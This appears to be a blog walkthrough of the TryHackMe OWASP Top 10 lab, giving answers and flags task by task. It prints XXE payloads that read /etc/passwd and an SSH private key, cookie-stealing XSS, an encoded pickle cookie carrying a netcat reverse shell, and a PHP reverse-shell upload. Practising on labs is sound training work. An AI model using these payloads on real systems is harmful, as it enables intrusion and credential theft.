Tryhackme - OWASP Top 10

Tryhackme – OWASP Top 10

In this walk through, we will be going through the OWASP Top 10 room from Tryhackme. This room has been designed to teach us about the OWASP Top 10 vulnerabilities and critical web security risks and how to exploit them in detail. So, let’s get started without any delay.

OWASP Top 10

Table of Contents

Task 1 – Introduction

  • Injection
  • Broken Authentication
  • Sensitive Data Exposure
  • XML External Entity
  • Broken Access Control
  • Security Misconfiguration
  • Cross-site Scripting
  • Insecure Deserialization
  • Components with Known Vulnerabilities
  • Insufficient Logging & Monitoring
Task 1 - Introduction

Task 2 – Accessing machines

Task 2 - Accessing machines
Tryhackme - OWASP Top 10

Task 3 – [Severity 1] Injection

Question 1 – I’ve understood Injection attacks.

Done
Task 3 - [Severity 1] Injection

Task 4 – [Severity 1] OS Command Injection

Question 1 – I’ve understood command injection.

Done
Task 4 - [Severity 1] OS Command Injection

Task 5 – [Severity 1] Command Injection Practical

Question 1 – What strange text file is in the website root directory?

ls
drpepper.txt 

Question 2 – How many non-root/non-service/non-daemon users are there?

cat /etc/passwd
0

Question 3 – What user is this app running as?

id
www-data

Question 4 – What is the user’s shell set as?

cat /etc/passwd | grep www-data
/usr/sbin/nologin 

Question 5 – What version of Ubuntu is running?

lsb_release -a
18.04.4

Question 6 – Print out the MOTD.  What favorite beverage is shown?

cat drpepper.txt
Dr Pepper
Task 5 - [Severity 1] Command Injection Practical

Task 6 – [Severity 2] Broken Authentication

Question 1 – I’ve understood broken authentication mechanisms.

Done
Task 6 - [Severity 2] Broken Authentication

Task 7 – [Severity 2] Broken Authentication Practical

Try to register a user name darren, you’ll see that user already exists so then try to register a user ” darren” and you’ll see that you are now logged in and will be able to see the content present only in Darren’s account which in our case is the flag that you need to retrieve.

Login Panel
Register
Error: This user is already registered
Register

Question 1 – What is the flag that you found in darren’s account?

Darren flag
fe86079416a21a3c99937fea8874b667

Question 2 – Now try to do the same trick and see if you can login as arthur.

Done
Register

Question 3 – What is the flag that you found in arthur’s account?

Arthur Flag
d9ac0f7db4fda460ac3edeb75d75e16e
Task 7 - [Severity 2] Broken Authentication Practical

Task 8 – [Severity 3] Sensitive Data Exposure (Introduction)

Task 8 - [Severity 3] Sensitive Data Exposure (Introduction)

Task 9 – [Severity 3] Sensitive Data Exposure (Supporting Material 1)

Question 1 – Read and understand the supporting material on SQLite Databases.

Done
Task 9 - [Severity 3] Sensitive Data Exposure (Supporting Material 1)

Task 10 – [Severity 3] Sensitive Data Exposure (Supporting Material 2)

Question 1 – Read the supporting material about cracking hashes.

Done
Task 10 - [Severity 3] Sensitive Data Exposure (Supporting Material 2)

Task 11 – [Severity 3] Sensitive Data Exposure (Challenge)

Question 1 – What is the name of the mentioned directory?

Login
Page Source code
/assets

Question 2 – Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Index of /assets
webapp.db

Question 3 – Use the supporting material to access the sensitive data. What is the password hash of the admin user?

sqlite3 webapp.db
6eea9b7ef19179a06954edd0f6c05ceb

Question 4 – What is the admin’s plaintext password?

Crackstation
qwertyuiop

Question 5 – Login as the admin. What is the flag?

Username: admin
Password: qwertyuiop

Flag
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
Task 11 - [Severity 3] Sensitive Data Exposure (Challenge)

Task 12 – [Severity 4] XML External Entity

Question 1 – Deploy the machine attached to the task.

Done
Task 12 - [Severity 4] XML External Entity

Task 13 – [Severity 4 XML External Entity – eXtensible Markup Language

Question 1 – Full form of XML

Extensible Markup Language

Question 2 – Is it compulsory to have XML prolog in XML documents?

No

Question 3 – Can we validate XML documents against a schema?

Yes

Question 4 – How can we specify XML version and encoding in XML document?

xml prolog
Task 13 - [Severity 4 XML External Entity - eXtensible Markup Language

Task 14 – [Severity 4] XML External Entity – DTD

Question 1 – How do you define a new ELEMENT?

!ELEMENT

Question 2 – How do you define a ROOT element?

!DOCTYPE

Question 3 – How do you define a new ENTITY?

!ENTITY
Task 14 - [Severity 4] XML External Entity - DTD

Task 15 – [Severity 4] XML External Entity – XXE Payload

Question 1 – Try the payload mentioned in description on the website.

Done
Payload - `<?xml version="1.0"?>   <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>   <root>&read;</root>`
XXE Attack
XXE Attack
/etc/passwd
Task 15 - [Severity 4] XML External Entity - XXE Payload

Task 16 – [Severity 4] XML External Entity – Exploiting

Question 1 – Try to display your own name using any payload.

Done
Payload: <?xml version="1.0"?><!DOCTYPE Tryhackme [<!ENTITY name "funkt10n"> ]>
 <userInfo>
  <firstName>null</firstName>
  <lastName>&name;</lastName>
 </userInfo>
XXE Attack
XXE Attack

Question 2 – See if you can read the /etc/passwd

Done
Payload: `<?xml version="1.0"?>   <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>   <root>&read;</root>`
XXE Attack
cat /etc/passwd

Question 3 – What is the name of the user in /etc/passwd

cat /etc/passwd
falcon

Question 4 – Where is falcon’s SSH key located?

/home/falcon/.ssh/id_rsa

Question 5 – What are the first 18 characters for falcon’s private key

Payload: `<?xml version="1.0"?>   <!DOCTYPE root [<!ENTITY read SYSTEM 'file://home/falcon/.ssh/id_rsa'>]>   <root>&read;</root>`
XXE Attack
RSA Private Key
MIIEogIBAAKCAQEA7b
Task 16 - [Severity 4] XML External Entity - Exploiting

Task 17 – [Severity 5] Broken Access Control

Question 1 – Read and understand how broken access control works.

Done
Task 17 - [Severity 5] Broken Access Control

Task 18 – [Severity 5] Broken Access Control (IDOR Challenge)

Question 1 – Read and understand how IDOR works.

Done

Question 2 – Deploy the machine and go to http://10.10.106.96 – Login with the username being noot and the password test1234.

Done
Note Viewer!
Note Viewer!
I am noot!

Question 3 – Look at other users notes. What is the flag?

flag
flag{fivefourthree}
Task 18 - [Severity 5] Broken Access Control (IDOR Challenge)

Task 19 – [Severity 6] Security Misconfiguration

Question 1 – Deploy the VM

Done

Question 2 – Hack into the webapp, and find the flag!

Pensive Noes login

Default credentials found on: https://github.com/NinjaJc01/PensiveNotes

Pensive Notes github
Pensive Notes
Task 19 - [Severity 6] Security Misconfiguration

Task 20 – [Severity 7] Cross-site Scripting

Question 1 – Deploy the VM

Done

Question 2 – Navigate to http://10.10.192.244/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.

Payload: <script>alert("Hello".)</script>
Reflective XSS
Questions
Hello
flag
ThereIsMoreToXSSThanYouThink

Question 3 – On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

Payload: <script>alert(window.location.hostname.)</script>
Reflective XSS
flag
ReflectiveXss4TheWin

Question 4 – Now navigate to http://10.10.192.244/ in your browser and click on the “Stored XSS” tab on the navbar; make an account. Then add a comment and see if you can insert some of your own HTML.

Register with a test user first and then type the following comment as payload.

  • Payload: Hello Friend!
Stored XSS
Add a comment
Comments
HTML_T4gs

Question 4 – On the same page, create an alert popup box appear on the page with your document cookies.

Payload: <script>alert(document.cookie)</script>
Add a comment
Cookie
flag
W3LL_D0N3_LVL2

Question 5 – Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.

Payload: <script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
Add a comment
Stored XSS
Flag
websites_can_be_easily_defaced_with_xss
Task 20 - [Severity 7] Cross-site Scripting

Task 21 – [Severity 8] Insecure Deserialization

Question 1 – Who developed the Tomcat application?

The Apache Software Foundation

Question 2 – What type of attack that crashes services can be performed with insecure deserialization?

Denial of Service
Task 21 - [Severity 8] Insecure Deserialization

Task 22 – [Severity 8] Insecure Deserialization – Objects

Question 1 – Select the correct term of the following statement:

if a dog was sleeping, would this be:_

A) A State
B) A Behaviour

A Behaviour
Task 22 - [Severity 8] Insecure Deserialization - Objects

Task 23 – [Severity 8] Insecure Deserialization – Deserialization

Question 1 – What is the name of the base-2 formatting that data is sent across a network as?

Binary
Task 23 - [Severity 8] Insecure Deserialization - Deserialization

Task 24 – [Severity 8] Insecure Deserialization – Cookies

Question 1 – If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?

webapp.com/login

Question 2 – What is the acronym for the web technology that Secure cookies work over?

HTTPS
Task 24 - [Severity 8] Insecure Deserialization - Cookies

Task 25 – [Severity 8] Insecure Deserialization – Cookies Practical

Question 1 – 1st flag (cookie value)

Sign up
Your Profile
Dev tools cookie value
Session ID - "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAY2VkZDI2OTYxMTNlNDBlNGIxZTMzYjE5ODg5MmYwY2NxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg=="

Decode with: base64decode.org

Decode Base64
THM{good_old_base64_huh}
THM{good_old_base64_huh}

Question 2 – 2nd flag (admin dashboard)

Modifying Cookie Values

Notice here that you have a cookie named “userType”. You are currently a user, as confirmed by your information on the “myprofile” page.

This application determines what you can and cannot see by your userType. What if you wanted to be come an admin?

Double left-click the “Value” column of “userType” to modify the contents. Let’s change our userType to “admin” and navigate to http://10.10.13.24/admin to answer the second flag.

Dev Tools cookie value
userType

Go to page: http://10.10.13.24/admin

Your Admin Dashboard
THM{heres_the_admin_flag} 
Task 25 - [Severity 8] Insecure Deserialization - Cookies Practical

Task 26 – [Severity 8] Insecure Deserialization – Code Execution

Question 1 – flag.txt

gedit pickleme.py
pickleme.py
python3 pickleme.py
Session ID - gASVdgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFtybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI+JjEgfCBuZXRjYXQgMTAuMTguMTA3LjE2NyA0NDQ0ID4gL3RtcC9mlIWUUpQu
netcat listener
dev tools cookie value
encodedPayload
  • Click on Feedback link and you will get a reverse shell.
netcat listener
flag.txt
4a69a7ff9fd68
Task 26 - [Severity 8] Insecure Deserialization - Code Execution

Task 27 – [Severity 9] Components With Known Vulnerabilities – Intro

Question 1 – Read above.

Done
Task 27 - [Severity 9] Components With Known Vulnerabilities - Intro

Task 28 – [Severity 9] Components With Known Vulnerabilities – Exploit

Question 1 – Read the above!

Done
Task 28 - [Severity 9] Components With Known Vulnerabilities - Exploit

Task 29 – [Severity 9] Components With Known Vulnerabilities – Lab

Question 1 – How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Welcome to online CSE bookstore
  • We have an application named CSE Bookstore. At the bottom right corner we have admin login mentioning 2017, which might reveal the date on which the portal is running, quite old.
  • Finding exploit on google related to CSE Bookstore 2017
cse bookstore 2017 exploit
Online Book Store 1.0 - Unauthenticated RCE
  • Download the exploit.
  • Firing the exploiting by – python3 47887.py http://10.10.162.73/
RCE

Another method for exploiting

  • Go to admin login page
  • Try default credentials: admin:admin
  • You will be logged into the admin panel
Add new book
  • Click on Edit
  • Click on Browse and upload a revese PHP shell on the server.
  • Click Confirm
Uploading reverse shell
Uploading the Book
  • Now setup a netcat listener on the specified port.
netcat listening
  • We have uploaded the reverse shell where the images for the products are store. Right click on any product image and open in new tab. you will get the following path:

http://10.10.162.73/bootstrap/img/

executing the payload
executing the payload
  • Now execute the reverse shell by visiting the following path – http://10.10.162.73/bootstrap/img/rev.php. You should get a connection back.
netcat listener
netcat listener
  • We have successfully pwned the system once more.
1611
Task 29 - [Severity 9] Components With Known Vulnerabilities - Lab

Task 30 – [Severity 10] Insufficient Logging and Monitoring

cat login-logs.txt

Question 1 – What IP address is the attacker using?

49.99.13.16

Question 2 – What kind of attack is being carried out?

Brute Force 
Task 30 - [Severity 10] Insufficient Logging and Monitoring

Task 31 – What Next?

Task 31 - What Next?

Also Read: Tryhackme – Overpass 2 (Hacked)

So that was “OWASP Top 10” for you. In this room, we have covered the OWASP Top 10 web application vulnerabilities and their exploitation, We have covered vulnerabilities like Injection which includes SQLi and more. Then, we took a dive in Broken authentication. Moving on, we learned about XSS, XXE, IDOR, Insecure Deserialization, Insufficient logging, Common known exploits and much more. This room was certainly very lengthy but covers everything in great detail regarding the OWASP Top 10 risks and vulnerabilities. On that note, i will take your leave and will meet you in next one. Till then, “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top